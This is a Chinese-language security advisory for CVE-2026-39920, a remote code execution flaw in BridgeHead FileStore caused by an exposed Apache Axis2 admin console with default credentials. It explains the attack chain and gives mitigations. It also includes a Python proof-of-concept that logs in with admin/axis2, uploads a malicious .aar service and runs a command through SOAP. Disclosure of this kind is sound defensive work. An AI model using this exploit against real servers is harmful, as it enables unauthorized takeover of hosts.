CVE-2026-39920 CVSS 9.8 严重

CVE-2026-39920 BridgeHead FileStore 远程代码执行漏洞

披露日期: 2026-04-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39920

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BridgeHead FileStore

漏洞概述

该漏洞存在于BridgeHead FileStore 24A之前的版本中。由于软件在网络可访问端点上暴露了Apache Axis2管理模块，且使用了默认凭据，导致未经身份验证的远程攻击者可以登录管理控制台，上传恶意Java归档文件作为Web服务，最终通过SOAP请求在主机上执行任意操作系统命令。

技术细节

该漏洞的根本原因是BridgeHead FileStore未修改Apache Axis2管理模块的默认凭证（通常为admin/axis2），并将管理接口暴露在网络可访问的端点上。攻击者无需复杂的漏洞利用技术，直接利用默认凭证即可登录Axis2后台管理控制台。登录后，攻击者利用Axis2的服务部署功能，上传一个包含恶意Java代码的.aar（Axis Archive）文件。服务器解析并部署该文件后，攻击者通过发送特制的SOAP请求触发该恶意服务，从而在服务器操作系统层面执行任意命令。这种利用方式简单直接，危害极高，允许攻击者完全控制受影响的主机。

攻击链分析

STEP 1

发现暴露的服务

攻击者扫描网络发现暴露在网上的Apache Axis2管理控制台端点。

STEP 2

默认凭证登录

攻击者使用Apache Axis2的默认用户名和密码（admin/axis2）成功登录管理后台。

STEP 3

上传恶意文件

攻击者通过后台的上传功能，部署包含恶意Java代码的.aar归档文件。

STEP 4

执行任意命令

攻击者向已部署的恶意Web服务发送SOAP请求，触发服务器端的命令执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target:8080/axis2/services/"
login_url = "http://target:8080/axis2/axis2-admin/login"
upload_url = "http://target:8080/axis2/axis2-admin/upload"
service_name = "MaliciousService"

# Default credentials
credentials = {
    "userName": "admin",
    "password": "axis2"
}

# 1. Login to Axis2 Admin Console
session = requests.Session()
login_response = session.post(login_url, data=credentials)

if login_response.status_code == 200 and "axis2-admin" in login_response.text:
    print("[+] Login successful using default credentials.")
    
    # 2. Upload malicious .aar file (Assuming 'exploit.aar' is prepared)
    # This step requires creating a .aar file with a Java class that executes commands
    files = {'file': ('exploit.aar', open('exploit.aar', 'rb'), 'application/java-archive')}
    upload_response = session.post(upload_url, files=files)
    
    if upload_response.status_code == 200:
        print("[+] Exploit .aar uploaded successfully.")
        
        # 3. Execute command via SOAP request
        # Constructing the SOAP envelope to call the malicious method
        soap_payload = f"""<?xml version='1.0' encoding='UTF-8'?>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
            <soapenv:Body>
                <ns1:executeCommand xmlns:ns1="http://service.example.com">
                    <cmd>whoami</cmd>
                </ns1:executeCommand>
            </soapenv:Body>
        </soapenv:Envelope>"""
        
        headers = {'Content-Type': 'text/xml'}
        exploit_response = session.post(f"{target_url}{service_name}", data=soap_payload, headers=headers)
        print("[+] Command execution response:")
        print(exploit_response.text)
    else:
        print("[-] Upload failed.")
else:
    print("[-] Login failed.")

影响范围

BridgeHead FileStore < 24A

防御指南

临时缓解措施

如果无法立即升级，请务必修改Apache Axis2管理控制台的默认用户名和密码，并通过防火墙规则限制对Axis2管理端口的访问，仅允许受信任的IP地址连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表